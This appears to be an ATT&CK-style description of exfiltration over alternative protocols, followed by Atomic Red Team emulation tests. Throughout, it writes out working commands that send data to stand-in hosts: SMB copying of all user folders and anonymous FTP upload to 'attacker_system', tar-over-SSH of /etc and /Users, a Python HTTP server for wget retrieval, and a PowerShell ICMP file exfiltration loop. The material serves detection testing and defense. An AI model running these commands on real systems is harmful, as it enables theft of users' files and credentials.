Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage.Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol.
SMB command-line example:
net use \\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users\* \\attacker_system\share_folder</code>
Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016)
echo PUT C:\Path\to\file.txt | ftp -A attacker_system
-
Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH
-
Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH
-
Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP
-
Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP
Input a domain and test Exfiltration over SSH
Remote to Local
Supported Platforms: macOS, Linux
Name
Description
Type
Default Value
domain
target SSH domain
url
target.example.com
user_name
username for domain
string
atomic
password
password for user
string
atomic
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
Input a domain and test Exfiltration over SSH
Local to Remote
Supported Platforms: macOS, Linux
Name
Description
Type
Default Value
domain
target SSH domain
url
target.example.com
user_name
username for domain
string
atomic
password
password for user
string
atomic
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
Supported Platforms: macOS, Linux
mkdir /tmp/victim-staging-area
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
-
Using Python to establish a one-line HTTP server on victim system:
cd /tmp/victim-staging-area
python -m SimpleHTTPServer 1337
-
To retrieve the data from an adversary system:
wget http://VICTIM_IP:1337/victim-file.txt
Exfiltration of specified file over ICMP protocol.
Supported Platforms: Windows
Name
Description
Type
Default Value
input_file
Path to file to be exfiltrated.
Path
C:\Windows\System32\notepad.exe
ip_address
Destination IP address where the data should be sent.
String
127.0.0.1
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }